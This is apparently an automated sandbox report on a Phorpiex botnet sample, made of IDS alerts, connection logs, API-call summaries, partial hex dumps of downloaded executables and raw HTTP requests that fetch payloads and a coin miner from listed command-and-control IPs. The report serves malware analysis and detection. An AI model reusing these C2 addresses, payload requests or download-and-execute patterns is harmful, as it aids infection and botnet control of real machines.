                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 93.188.83.238:40500
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.6:49826
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49914 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49957 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 80.191.218.209:40500
                                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.6:49763
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49994 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 85.233.153.109:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 90.156.160.66:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 188.212.80.105:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 2.181.31.167:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 77.240.41.3:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:49998 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50004 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 151.243.242.97:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50001 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50000 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50006 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 91.246.92.22:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 178.91.91.225:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 78.39.234.9:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50007 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 90.156.163.55:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50015 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 94.158.52.97:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 46.100.164.239:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50023 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50012 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50025 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50016 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.6:58415 -> 213.206.45.227:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50021 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50020 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50027 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50013 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50018 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.6:50010 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.6:49814
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.6:50018
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.6:50000
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040B430
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040B430
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com18_2_0040B430
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_001410B0 Sleep,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_001410B0
                                Source: global trafficTCP traffic: 192.168.2.6:49831 -> 88.151.180.214:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49873 -> 92.47.47.166:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49952 -> 90.156.162.125:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49996 -> 94.183.35.46:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49999 -> 198.163.192.16:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50002 -> 90.156.163.55:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50005 -> 59.91.192.122:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50008 -> 185.215.113.66:5152
                                Source: global trafficTCP traffic: 192.168.2.6:50009 -> 78.37.229.249:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50011 -> 5.239.153.192:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50014 -> 178.22.171.158:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50017 -> 2.178.164.63:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50019 -> 94.230.230.211:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50022 -> 5.237.148.223:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50024 -> 37.151.113.156:40500
                                Source: global trafficTCP traffic: 192.168.2.6:50026 -> 89.218.239.82:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 85.173.115.180:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 90.156.163.121:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 62.209.135.143:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 213.230.97.241:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 93.188.83.238:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 95.58.216.162:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 80.191.218.209:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 85.233.153.109:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 188.212.80.105:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 90.156.160.66:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 88.204.242.226:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 2.181.31.167:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 77.240.41.3:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 151.243.242.97:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 178.91.91.225:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 91.246.92.22:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 78.39.234.9:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 197.165.192.61:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 94.158.52.97:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 46.100.164.239:40500
                                Source: global trafficUDP traffic: 192.168.2.6:58415 -> 213.206.45.227:40500
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:26 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Sun, 20 Oct 2024 18:13:32 GMTConnection: keep-aliveETag: "6715484c-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:09 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
                                Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49856 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49814 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49867 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49914 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49957 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49991 -> 185.215.113.84:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49994 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49997 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49998 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50004 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50001 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50000 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50006 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50007 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50015 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50023 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50012 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50025 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50016 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50021 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50020 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50027 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50018 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50013 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:50010 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.6:50008 -> 185.215.113.66:5152
                                Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
